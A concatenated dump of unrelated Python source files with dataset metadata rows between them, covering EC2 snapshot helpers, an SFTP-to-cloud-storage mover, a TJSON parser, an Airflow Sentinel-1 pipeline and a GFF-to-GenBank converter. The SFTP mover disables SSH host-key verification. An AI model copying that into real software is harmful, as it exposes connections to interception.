try:
global client_k8s
client_k8s = DynamicClient(client=kubernetes.config.new_client_from_config())
nodes = [m for m in Node.get(dyn_client=client_k8s)]
if len(nodes) != 0:
print(f"Found {len(nodes)} node, OpenShift Cluster is ready!")
break
except urllib3.exceptions.MaxRetryError: pass
except kubernetes.client.exceptions.ApiException: pass
time.sleep(10)
def get_machine_props():
if not client_k8s:
return None, None
machines = [m for m in Machine.get(dyn_client=client_k8s)]
if len(machines) != 1:
raise RuntimeError("Should be only one machine ...")
machine = machines[0]
cluster_name = machine.cluster_name
print(f"Cluster name: {cluster_name}")
instance = resource_ec2.Instance(machine.instance.status.providerStatus.instanceId)
instance.load()
print(f"Instance Id: {instance.id}")
zone = machine.instance.spec.providerSpec.value.placement.availabilityZone
print(f"Availability zone: {zone}")
return cluster_name, instance, zone
def get_instance_root_volume(instance):
volumes = [v for v in instance.volumes.all()]
if len(volumes) > 1:
print("WARNING: more than 1 volume found ...")
return volumes[0]
def get_cluster_snapshot(cluster_name, instance, zone):
resp = client_ec2.describe_snapshots(
Filters=[{
'Name': f'tag:kubernetes.io/cluster/{cluster_name}',
'Values': ['owned']
}])
snapshots = resp["Snapshots"]
if len(snapshots) == 0:
return None
if len(snapshots) > 1:
print("WARNING: more than 1 snapshot found ... taking the first one.")
snapshot = resource_ec2.Snapshot(snapshots[0]['SnapshotId'])
snapshot.load()
return snapshot
def await_snapshot(snapshot):
prev = ""
if snapshot.progress == "100%":
print(f"Snapshot {snapshot.id} is ready.")
while not snapshot.progress == "100%":
if prev == "":
print(f"Awaiting for the completion of snapshot {snapshot.id} ...")
print(snapshot.progress)
prev = snapshot.progress
time.sleep(10)
snapshot.reload()
if prev != snapshot.progress:
prev = snapshot.progress
print(snapshot.progress)
def human_ts():
return datetime.datetime.now().strftime("%Y-%m-%dT%H:%M")
| 28.330435 | 89 | 0.664825 | 396 | 3,258 | 5.366162 | 0.323232 | 0.029647 | 0.022588 | 0.018824 | 0.170353 | 0.136471 | 0.115765 | 0.059294 | 0.059294 | 0.059294 | 0 | 0.016969 | 0.222222 | 3,258 | 114 | 90 | 28.578947 | 0.821626 | 0.025476 | 0 | 0.142857 | 0 | 0 | 0.189411 | 0.012606 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0.02381 | 0.142857 | 0.011905 | 0.285714 | 0.178571 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a32a66412ac752dfef1346767dada6ace8dbe66 | 280 | py | Python | tests/send_update.py | ZenLighting/ZenLightSimulator | 974e2806106e534aede35b5a9efd8667c55a6a25 | [
"MIT"
] | null | null | null | tests/send_update.py | ZenLighting/ZenLightSimulator | 974e2806106e534aede35b5a9efd8667c55a6a25 | [
"MIT"
] | null | null | null | tests/send_update.py | ZenLighting/ZenLightSimulator | 974e2806106e534aede35b5a9efd8667c55a6a25 | [
"MIT"
] | null | null | null | import socket
import struct
send_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
data_bytes = struct.pack("!BBBB", 0, 0, 255, 255)
header = struct.pack("!BIIH", 0, 0, 0, len(data_bytes))
message = header + data_bytes
send_sock.sendto(message, ("localhost", 42000)) | 23.333333 | 63 | 0.721429 | 44 | 280 | 4.431818 | 0.477273 | 0.138462 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069388 | 0.125 | 280 | 12 | 64 | 23.333333 | 0.726531 | 0 | 0 | 0 | 0 | 0 | 0.067616 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a3459ee78d5b57a83665367b43a2ebae445c84e | 3,001 | py | Python | app/mover.py | uk-gov-mirror/ONSdigital.blaise-nisra-case-mover | 6bc3af5eec43ee543bcfed428779ca57f903007f | [
"MIT"
] | null | null | null | app/mover.py | uk-gov-mirror/ONSdigital.blaise-nisra-case-mover | 6bc3af5eec43ee543bcfed428779ca57f903007f | [
"MIT"
] | null | null | null | app/mover.py | uk-gov-mirror/ONSdigital.blaise-nisra-case-mover | 6bc3af5eec43ee543bcfed428779ca57f903007f | [
"MIT"
] | null | null | null | from typing import Dict
import pysftp
from flask import Blueprint, current_app
from paramiko import SSHException
from models import Instrument
from pkg.case_mover import CaseMover
from pkg.google_storage import GoogleStorage
from pkg.sftp import SFTP
from util.service_logging import log
mover = Blueprint("batch", __name__, url_prefix="/")
@mover.route("/")
def main():
config = current_app.nisra_config
sftp_config = current_app.sftp_config
google_storage = init_google_storage(config)
if google_storage.bucket is None:
return "Connection to bucket failed", 500
log.info("Connecting to SFTP server")
cnopts = pysftp.CnOpts()
cnopts.hostkeys = None
with pysftp.Connection(
host=sftp_config.host,
username=sftp_config.username,
password=sftp_config.password,
port=int(sftp_config.port),
cnopts=cnopts,
) as sftp_connection:
log.info("Connected to SFTP server")
sftp = SFTP(sftp_connection, sftp_config, config)
case_mover = CaseMover(google_storage, config, sftp)
instruments = get_filtered_instruments(sftp)
log.info(f"Processing survey - {sftp_config.survey_source_path}")
if len(instruments) == 0:
log.info("No instrument folders found")
return "No instrument folders found, exiting", 200
for instrument_name, instrument in instruments.items():
process_instrument(case_mover, instrument_name, instrument)
log.info("SFTP connection closed")
log.info("Process complete")
return "Process complete", 200
@mover.errorhandler(SSHException)
def handle_ssh_exception(exception):
log.error("SFTP connection failed - %s", exception)
return "SFTP connection failed", 500
@mover.errorhandler(Exception)
def handle_exception(exception):
log.error("Exception - %s", exception)
log.info("SFTP connection closed")
return "Exception occurred", 500
def process_instrument(
case_mover: CaseMover, instrument_name: str, instrument: Instrument
) -> None:
log.info(f"Processing instrument - {instrument_name} - {instrument.sftp_path}")
if case_mover.bdbx_md5_changed(instrument):
log.info(
f"Instrument - {instrument_name} - "
+ "has no changes to the databse file, skipping..."
)
else:
log.info(f"Syncing instrument - {instrument_name}")
case_mover.sync_instrument(instrument)
case_mover.send_request_to_api(instrument.gcp_folder())
def get_filtered_instruments(sftp: SFTP) -> Dict[str, Instrument]:
instrumets = sftp.get_instrument_folders()
instruments = sftp.get_instrument_files(instrumets)
instruments = sftp.filter_instrument_files(instruments)
instruments = sftp.generate_bdbx_md5s(instruments)
return instruments
def init_google_storage(config):
google_storage = GoogleStorage(config.bucket_name, log)
google_storage.initialise_bucket_connection()
return google_storage
| 31.925532 | 83 | 0.71876 | 358 | 3,001 | 5.818436 | 0.304469 | 0.033605 | 0.015362 | 0.022084 | 0.025924 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00742 | 0.191603 | 3,001 | 93 | 84 | 32.268817 | 0.851195 | 0 | 0 | 0.027778 | 0 | 0 | 0.179607 | 0.017994 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0.013889 | 0.125 | 0 | 0.305556 | 0.027778 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a35308e3e1033d1025ac934d26add8ef584b069 | 3,156 | py | Python | pytjson/_tjson/datatype.py | anupsv/tjson | 672dcb6a5161260620df880f2828ae3c445fc6b8 | [
"MIT"
] | null | null | null | pytjson/_tjson/datatype.py | anupsv/tjson | 672dcb6a5161260620df880f2828ae3c445fc6b8 | [
"MIT"
] | 3 | 2017-11-17T12:38:57.000Z | 2021-11-15T17:46:44.000Z | pytjson/_tjson/datatype.py | anupsv/pytjson | 672dcb6a5161260620df880f2828ae3c445fc6b8 | [
"MIT"
] | 1 | 2016-11-15T08:19:17.000Z | 2016-11-15T08:19:17.000Z | import re, datetime
from Helpers.freezable_list import FrozenDict
from pytjson.Exceptions import ParseError
class Datatype:
# Initializer, will be overriden below
TAGS = {}
isScalar = re.compile(r'^[a-z0-9]*$')
isBin = re.compile('^[01]{8}$')
isOnlyNumbers = re.compile('^\-?(0|[1-9][0-9]*)$')
isNonScalar = re.compile(r'^([A-Z][a-z0-9]*)\<(.*)\>$')
@staticmethod
def parse(tag):
if not isinstance(tag, (str, unicode)):
raise TypeError("expected String, got {}".format(type(tag)))
if tag == "O":
# Object
return Datatype.TAGS[tag]
elif Datatype.isNonScalar.match(tag):
tmp_inner = Datatype.isNonScalar.match(tag).group(2)
tmp_type = Datatype.isNonScalar.match(tag).group(1)
inner = Datatype.parse(tmp_inner)
if tmp_type == "A":
tmp = Array(inner)
else:
tmp = Datatype.TAGS[tmp_type]
return tmp
elif Datatype.isScalar.match(tag):
# Scalar
return Datatype.TAGS[tag]
else:
raise ParseError("couldn't parse tag: {}".format(repr(tag)))
@staticmethod
def identify_type(obj, is_bytes):
if type(obj) is dict:
return Datatype.TAGS["O"]
elif type(obj) is list:
t = Array(None)
return t._identify_type(obj)
elif isinstance(obj, (str)):
return Datatype.TAGS["s"]
elif type(obj) is int:
return Datatype.TAGS["i"]
elif type(obj) is float:
return Datatype.TAGS["f"]
elif isinstance(obj, datetime.datetime):
return Datatype.TAGS["t"]
elif is_bytes:
return Datatype.TAGS["b"]
else:
raise TypeError("don't know how to serialize #{obj.class} as TJSON")
def datatype_generate(self, obj):
is_bytes = False if not isinstance(obj, bytes) else True
return self.identify_type(obj, is_bytes).generate(obj)
class Scalar(Datatype):
@staticmethod
def isScalar():
return True
class NonScalar(Datatype):
def __init__(self, inner_type):
self.inner_type = inner_type
@staticmethod
def isScalar():
return False
class Number(Scalar):
pass
class Integer:
@staticmethod
def generate(int_data):
# Integers are serialized as strings to sidestep the limits of some JSON parsers
return str(int_data).encode("utf-8")
class Binary(Scalar):
pass
from datatypes.string import String
from datatypes.timestamp import Timestamp
from datatypes.float import Float
from datatypes.integer import SignedInt, UnsignedInt
from datatypes.array import Array
from datatypes.binary import Binary16, Binary32, Binary64
from datatypes.object import Object
class Datatype(Datatype):
Datatype.TAGS = FrozenDict(
O = Object(None),
b = Binary64(),
b16 = Binary16(),
b32 = Binary32(),
b64 = Binary64(),
f = Float(),
i = SignedInt(),
s = String(),
t = Timestamp(),
u = UnsignedInt()
)
| 26.745763 | 88 | 0.596641 | 372 | 3,156 | 4.997312 | 0.317204 | 0.064551 | 0.077461 | 0.043572 | 0.058096 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015604 | 0.28929 | 3,156 | 117 | 89 | 26.974359 | 0.813197 | 0.040875 | 0 | 0.159091 | 0 | 0 | 0.057247 | 0.008604 | 0 | 0 | 0 | 0 | 0 | 1 | 0.079545 | false | 0.022727 | 0.113636 | 0.034091 | 0.488636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a3613dff1cdfc6a420222a030f7083c34976694 | 864 | py | Python | Code Challenges/python/checkPalindrome_codesignal.py | lineality/Coding-Challenges-Study-Practice | 76d868b11b42b3bd3634f9a62abecb2e1eaac76d | [
"MIT"
] | null | null | null | Code Challenges/python/checkPalindrome_codesignal.py | lineality/Coding-Challenges-Study-Practice | 76d868b11b42b3bd3634f9a62abecb2e1eaac76d | [
"MIT"
] | 1 | 2021-06-24T17:39:48.000Z | 2021-06-24T17:39:48.000Z | Code Challenges/python/checkPalindrome_codesignal.py | lineality/Coding-Study | 76d868b11b42b3bd3634f9a62abecb2e1eaac76d | [
"MIT"
] | null | null | null | # not working, not sure why (as parts work separately
# outside of function)
# (User's) Problem
# We have:
# a string
# We need:
# is that string a paindrome? yes/no
# We must:
# boolean output
# name of function is
# checkPalindrome
# Solution (Product)
# Strategy 1:
# turn string into a list(array)
# Make a compare_list which is the reverse order of
# the original list
# compare the two, if they are the same: true, else false
def checkPalindrome(inputString):
# make input a list
input_as_list = list(inputString)
# make a reverse list
# (first make a copy)
reverse_order = input_as_list
# (this function has no input or output, it reverses in place)
reverse_order.reverse()
# compare two lists
if input_as_list == reverse_order:
return True
else:
return False
| 24 | 66 | 0.664352 | 124 | 864 | 4.548387 | 0.532258 | 0.085106 | 0.058511 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001577 | 0.266204 | 864 | 35 | 67 | 24.685714 | 0.888013 | 0.659722 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a37bfae9bd13611e15a98b21e3b6c87ccdce595 | 13,296 | py | Python | airflow/dags/sentinel1/S1_GRD_1SDV.py | geosolutions-it/evo-odas | 983912614317c28ba88fe078f5069266dd8469bb | [
"MIT"
] | 29 | 2018-01-03T18:41:03.000Z | 2022-02-03T01:15:46.000Z | airflow/dags/sentinel1/S1_GRD_1SDV.py | geosolutions-it/evo-odas | 983912614317c28ba88fe078f5069266dd8469bb | [
"MIT"
] | 226 | 2016-10-05T10:01:12.000Z | 2021-07-20T18:47:59.000Z | airflow/dags/sentinel1/S1_GRD_1SDV.py | geosolutions-it/evo-odas | 983912614317c28ba88fe078f5069266dd8469bb | [
"MIT"
] | 13 | 2016-10-13T14:55:33.000Z | 2022-02-03T01:15:33.000Z | """
/*********************************************************************************/
* The MIT License (MIT) *
* *
* Copyright (c) 2014 EOX IT Services GmbH *
* *
* Permission is hereby granted, free of charge, to any person obtaining a copy *
* of this software and associated documentation files (the "Software"), to deal *
* in the Software without restriction, including without limitation the rights *
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell *
* copies of the Software, and to permit persons to whom the Software is *
* furnished to do so, subject to the following conditions: *
* *
* The above copyright notice and this permission notice shall be included in *
* all copies or substantial portions of the Software. *
* *
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR *
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, *
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE *
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER *
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, *
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE *
* SOFTWARE. *
* *
*********************************************************************************/
"""
import os
import logging
import pprint
from datetime import datetime, timedelta
from airflow import DAG
from airflow.models import XCOM_RETURN_KEY
from airflow.operators import PythonOperator
from airflow.operators import RSYNCOperator
from airflow.operators import DHUSSearchOperator
from airflow.operators import DHUSDownloadOperator
from airflow.operators import ZipInspector
from airflow.operators import S1MetadataOperator
from airflow.operators import GDALWarpOperator
from airflow.operators import GDALAddoOperator
from airflow.utils.trigger_rule import TriggerRule
from geoserver_plugin import publish_product
import config as CFG
import config.s1_grd_1sdv as S1GRD1SDV
log = logging.getLogger(__name__)
# Settings
default_args = {
##################################################
# General configuration
#
'start_date': datetime.now() - timedelta(hours=1),
'owner': 'airflow',
'depends_on_past': False,
'provide_context': True,
'email': ['airflow@evoodas.dlr.de'],
'email_on_failure': False,
'email_on_retry': False,
'retries': 1,
'max_threads': 1,
'max_active_runs': 1,
# 'queue': 'bash_queue',
# 'pool': 'backfill',
# 'priority_weight': 10,
# 'end_date': datetime(2016, 1, 1),
#
}
print("#######################")
print("Interval: ".format(S1GRD1SDV.dag_schedule_interval))
print("ID: {}".format(S1GRD1SDV.id))
print("DHUS: {} @ {}, Region: {}".format(CFG.dhus_username, CFG.dhus_url, S1GRD1SDV.dhus_search_bbox) )
print("GeoServer: {} @ {}".format(CFG.geoserver_username, CFG.geoserver_rest_url) )
print("RSYNC: {} @ {} using {}".format(CFG.rsync_username, CFG.rsync_hostname, CFG.rsync_ssh_key))
print("Date: {} / {}".format(S1GRD1SDV.dhus_search_startdate, S1GRD1SDV.dhus_search_enddate))
print("Search: max={}, order_by={}, keywords={}".format(S1GRD1SDV.dhus_filter_max, S1GRD1SDV.dhus_search_orderby,S1GRD1SDV.dhus_search_keywords))
print("Paths:\n collection_dir={}\n download_dir={}\n process_dir={}\n original_package_upload_dir={}\n repository_dir={}".format(S1GRD1SDV.collection_dir, S1GRD1SDV.download_dir, S1GRD1SDV.process_dir, S1GRD1SDV.original_package_upload_dir, S1GRD1SDV.repository_dir))
print("Collection:\n workspace={}\n layer={}".format(S1GRD1SDV.geoserver_workspace, S1GRD1SDV.geoserver_layer))
print("#######################")
TARGET_SRS = 'EPSG:4326'
TILE_SIZE = 512
OVERWRITE = True
RESAMPLING_METHOD = 'average'
MAX_OVERVIEW_LEVEL = 512
def prepare_band_paths(get_inputs_from, *args, **kwargs):
"""Get Product / Band files path Dictionary from ZipInspector and extract the list of band files """
task_instance = kwargs['ti']
# band number from task name
task_id = task_instance.task_id
band_number = int(task_id.split('_')[-1])
log.info("Getting inputs from: " + get_inputs_from)
product_bands_dict = task_instance.xcom_pull(task_ids=get_inputs_from, key=XCOM_RETURN_KEY)
if product_bands_dict is None:
log.info("No input from ZipInspector. Nothing to do")
return None
log.info("Product Band Dictionary: {}".format(pprint.pformat(product_bands_dict)))
files_path=[]
for k in product_bands_dict:
files_path += product_bands_dict[k]
# Push one of the band paths to XCom
file_path = files_path[band_number - 1]
return [file_path]
# DAG definition
dag = DAG(S1GRD1SDV.id,
description='DAG for searching, filtering and downloading Sentinel 1 data from DHUS server',
schedule_interval=S1GRD1SDV.dag_schedule_interval,
catchup=False,
default_args=default_args
)
# DHUS Search Task Operator
search_task = DHUSSearchOperator(task_id='search_product_task',
dhus_url=CFG.dhus_url,
dhus_user=CFG.dhus_username,
dhus_pass=CFG.dhus_password,
geojson_bbox=S1GRD1SDV.dhus_search_bbox,
startdate=S1GRD1SDV.dhus_search_startdate,
enddate=S1GRD1SDV.dhus_search_enddate,
filter_max=S1GRD1SDV.dhus_filter_max,
order_by=S1GRD1SDV.dhus_search_orderby,
keywords=S1GRD1SDV.dhus_search_keywords,
dag=dag)
# DHUS Download Task Operator
download_task = DHUSDownloadOperator(task_id='download_product_task',
dhus_url=CFG.dhus_url,
dhus_user=CFG.dhus_username,
dhus_pass=CFG.dhus_password,
download_max=S1GRD1SDV.dhus_download_max,
download_dir=S1GRD1SDV.download_dir,
get_inputs_from=search_task.task_id,
download_timeout=timedelta(hours=12),
dag=dag)
# Rsync Archive Task for Products
archive_task = RSYNCOperator(task_id="upload_original_package",
host = CFG.rsync_hostname,
remote_usr = CFG.rsync_username,
ssh_key_file = CFG.rsync_ssh_key,
remote_dir = S1GRD1SDV.original_package_upload_dir,
get_inputs_from=download_task.task_id,
dag=dag)
# Zip Inspector and Extractor Task
zip_task = ZipInspector(task_id='zip_inspector',
extension_to_search='tiff',
get_inputs_from=download_task.task_id,
dag=dag)
warp_tasks = []
addo_tasks = []
upload_tasks = []
band_paths_tasks = []
for i in range(1, 3):
band_paths = PythonOperator(task_id="get_band_paths_" + str(i),
python_callable=prepare_band_paths,
op_kwargs={
'get_inputs_from': zip_task.task_id
},
dag=dag)
band_paths_tasks.append(band_paths)
warp = GDALWarpOperator(
task_id='gdalwarp_' + str(i),
target_srs=TARGET_SRS,
tile_size=TILE_SIZE,
overwrite=OVERWRITE,
dstdir=S1GRD1SDV.process_dir,
get_inputs_from=band_paths.task_id,
dag=dag
)
warp_tasks.append(warp)
addo = GDALAddoOperator(
trigger_rule=TriggerRule.ALL_SUCCESS,
resampling_method=RESAMPLING_METHOD,
max_overview_level=MAX_OVERVIEW_LEVEL,
task_id='gdal_addo_' + str(i),
get_inputs_from=warp.task_id,
dag=dag
)
addo_tasks.append(addo)
upload = RSYNCOperator(task_id="upload_granule_{}_task".format(str(i)),
host=CFG.rsync_hostname,
remote_usr=CFG.rsync_username,
ssh_key_file=CFG.rsync_ssh_key,
remote_dir=S1GRD1SDV.repository_dir,
get_inputs_from=addo.task_id,
dag=dag)
upload_tasks.append(upload)
band_paths.set_upstream(zip_task)
warp.set_upstream(band_paths)
addo.set_upstream(warp)
upload.set_upstream(addo)
# Metadata Extraction task
addo_task_ids = ( task.task_id for task in addo_tasks )
upload_task_ids = ( task.task_id for task in upload_tasks )
metadata_task = S1MetadataOperator(task_id="extract_metadata_task",
product_safe_path=None,
granules_paths=None,
granules_upload_dir=S1GRD1SDV.repository_dir,
processing_dir=S1GRD1SDV.process_dir,
original_package_download_base_url=S1GRD1SDV.original_package_download_base_url,
gs_workspace=S1GRD1SDV.geoserver_workspace,
bands_dict = S1GRD1SDV.bands_dict,
gs_wms_layer=S1GRD1SDV.geoserver_layer,
gs_wfs_featuretype=S1GRD1SDV.geoserver_featuretype,
gs_wfs_format=S1GRD1SDV.geoserver_oseo_wfs_format,
gs_wfs_version=S1GRD1SDV.geoserver_oseo_wfs_version,
gs_wms_width=S1GRD1SDV.geoserver_oseo_wms_width,
gs_wms_height=S1GRD1SDV.geoserver_oseo_wms_height,
gs_wms_format=S1GRD1SDV.geoserver_oseo_wms_format,
gs_wms_version=S1GRD1SDV.geoserver_oseo_wms_version,
gs_wcs_coverage_id=S1GRD1SDV.geoserver_coverage,
gs_wcs_scale_i=S1GRD1SDV.geoserver_oseo_wcs_scale_i,
gs_wcs_scale_j=S1GRD1SDV.geoserver_oseo_wcs_scale_j,
gs_wcs_format=S1GRD1SDV.geoserver_oseo_wcs_format,
gs_wcs_version=S1GRD1SDV.geoserver_oseo_wcs_version,
get_inputs_from = {
'download_task_id': download_task.task_id,
'addo_task_ids': addo_task_ids,
'upload_task_ids': upload_task_ids,
'archive_product_task_id' : archive_task.task_id,
},
dag=dag)
# Publish product.zip to GeoServer
publish_task = PythonOperator(task_id="publish_product_task",
python_callable=publish_product,
op_kwargs={
'geoserver_username': CFG.geoserver_username,
'geoserver_password': CFG.geoserver_password,
'geoserver_rest_endpoint': '{}/oseo/collections/{}/products'.format(CFG.geoserver_rest_url, S1GRD1SDV.geoserver_oseo_collection), 'get_inputs_from': metadata_task.task_id,
},
dag = dag)
if CFG.eoxserver_rest_url:
publish_eox_task = PythonOperator(task_id="publish_product_eox_task",
python_callable=publish_product,
op_kwargs={
'geoserver_username': CFG.eoxserver_username,
'geoserver_password': CFG.eoxserver_password,
'geoserver_rest_endpoint': CFG.eoxserver_rest_url,
'get_inputs_from': metadata_task.task_id,
},
dag = dag)
download_task.set_upstream(search_task)
archive_task.set_upstream(download_task)
zip_task.set_upstream(download_task)
metadata_task.set_upstream(download_task)
metadata_task.set_upstream(archive_task)
for task in upload_tasks:
metadata_task.set_upstream(task)
publish_task.set_upstream(metadata_task)
if CFG.eoxserver_rest_url:
publish_eox_task.set_upstream(metadata_task)
| 47.655914 | 273 | 0.571224 | 1,357 | 13,296 | 5.27045 | 0.23434 | 0.024329 | 0.02363 | 0.015101 | 0.196309 | 0.141779 | 0.119128 | 0.111437 | 0.094379 | 0.061801 | 0 | 0.015117 | 0.338297 | 13,296 | 278 | 274 | 47.827338 | 0.797795 | 0.187801 | 0 | 0.17 | 0 | 0 | 0.105317 | 0.029011 | 0 | 0 | 0 | 0 | 0 | 1 | 0.005 | false | 0.02 | 0.09 | 0 | 0.105 | 0.065 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a37c7ba2d228caef670de2aefc502f114329be0 | 579 | py | Python | cfn_model/model/EC2NetworkInterface.py | jaymecd/cloudformation-validator | 4f6951a002f338010b63fa3fbd23ddd8022558fa | [
"MIT"
] | 6 | 2018-08-07T01:58:16.000Z | 2020-09-10T14:40:35.000Z | cfn_model/model/EC2NetworkInterface.py | jaymecd/cloudformation-validator | 4f6951a002f338010b63fa3fbd23ddd8022558fa | [
"MIT"
] | 1 | 2018-10-16T20:40:27.000Z | 2018-10-17T02:18:05.000Z | cfn_model/model/EC2NetworkInterface.py | jaymecd/cloudformation-validator | 4f6951a002f338010b63fa3fbd23ddd8022558fa | [
"MIT"
] | 1 | 2019-01-17T21:35:47.000Z | 2019-01-17T21:35:47.000Z | from __future__ import absolute_import, division, print_function
from cfn_model.model.ModelElement import ModelElement
class EC2NetworkInterface(ModelElement):
"""
Ec2 network interface model lement
"""
def __init__(self, cfn_model):
"""
Initialize
:param cfn_model:
"""
ModelElement.__init__(self, cfn_model)
self.groupSet= []
self.ipv6Addresses= []
self.privateIpAddresses= []
self.tags= []
self.security_groups= []
self.resource_type = 'AWS::EC2::NetworkInterface'
| 23.16 | 64 | 0.637306 | 54 | 579 | 6.462963 | 0.574074 | 0.091691 | 0.063037 | 0.091691 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00939 | 0.264249 | 579 | 24 | 65 | 24.125 | 0.809859 | 0.108808 | 0 | 0 | 0 | 0 | 0.055914 | 0.055914 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.181818 | 0 | 0.363636 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a39f0ac1b52e80601d37b28ec8d2bbc57258c03 | 24,381 | py | Python | gff_to_gbk.py | ArnaudBelcour/gbk_from_gff | addf14c55cc5845c68a985c3d9b613bf3153071c | [
"MIT"
] | 3 | 2019-06-08T11:48:11.000Z | 2021-11-29T19:58:48.000Z | gff_to_gbk.py | ArnaudBelcour/gbk_from_gff | addf14c55cc5845c68a985c3d9b613bf3153071c | [
"MIT"
] | null | null | null | gff_to_gbk.py | ArnaudBelcour/gbk_from_gff | addf14c55cc5845c68a985c3d9b613bf3153071c | [
"MIT"
] | 2 | 2020-05-15T12:58:17.000Z | 2020-08-05T06:13:23.000Z | #!/usr/bin/env python3
# coding: utf8
"""
Description:
Using fasta files (scaffold/chromosme/contig file, protein file), gff file, annotation tsv file and the species name
this script writes a genbank file.
The annotation tsv file contains association between gene and annotation (EC number, GO term, Interpro)
to add information to the genbank.
The species name needs to be compatible with the taxonomy of the EBI.
Informations need a good formating:
gene ID should be correctly written (like XXX_001 and no XXX_1 if you got more thant 100 genes).
Currently when there is multiple GO terms/InterPro/EC the script split them when they are separated by ";" or by "," like GO:0006979;GO:0020037;GO:0004601,
if you use another separator add to the re.split(',|;').
For the gff file ensure that the element start position is at least 1.
If it's 0 gffutils will return an error (source : https://github.com/daler/gffutils/issues/104).
Other informations can be added by adding a dictionary with gene ID as key and the information
as value and adapt the condition used for the others annotations (EC, Interpro, Go term).
Usage:
gbk_creator_from_gff.py -fg <Genome fasta file> -fp <Protein Fasta file> -a <Annotation TSV file> -g <GFF file> -s <Species name> -o <GBK Output file name>
"""
import argparse
import datetime
import gffutils
import numpy as np
import os
import pandas as pa
import pronto
import re
import requests
import shutil
from Bio import SeqFeature as sf
from Bio import SeqIO
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
from collections import OrderedDict
try:
from Bio.Alphabet import IUPAC
except ImportError:
IUPAC = None
def merging_mini_gff(gff_folder):
"""
Merge multiple gff files into one.
Return the path to the merged file.
"""
mini_gff_path = os.path.dirname(os.path.realpath(os.listdir(gff_folder)[0])) + "/" + gff_folder + "/"
gff_merged_path = mini_gff_path + 'merged_gff.gff'
with open(gff_merged_path, 'w') as gff_file_merged:
gff_files = os.listdir(gff_folder)
gff_files.remove('merged_gff.gff')
for mini_gff in gff_files:
with open(mini_gff_path + mini_gff, 'rb') as mini_gff_file:
shutil.copyfileobj(mini_gff_file, gff_file_merged)
return gff_merged_path
def create_GO_dataframes():
"""
Use pronto to query the Gene Ontology and to create the Ontology.
Create a dataframe which contains for all GO terms their GO namespaces (molecular_function, ..).
Create a second dataframe containing alternative ID for some GO terms (deprecated ones).
"""
go_ontology = pronto.Ontology('http://purl.obolibrary.org/obo/go/go-basic.obo')
# For each GO terms look to the namespaces associated with them.
go_namespaces = {}
for go_term in go_ontology:
if 'GO:' in go_term:
go_namespaces[go_term] = go_ontology[go_term].namespace
df_go_namespace = pa.DataFrame.from_dict(go_namespaces, orient='index')
df_go_namespace.reset_index(inplace=True)
df_go_namespace.columns = ['GO', 'namespace']
# For each GO terms look if there is an alternative ID fo them.
go_alt_ids = {}
for go_term in go_ontology:
if go_ontology[go_term].alternate_ids != frozenset():
for go_alt in go_ontology[go_term].alternate_ids:
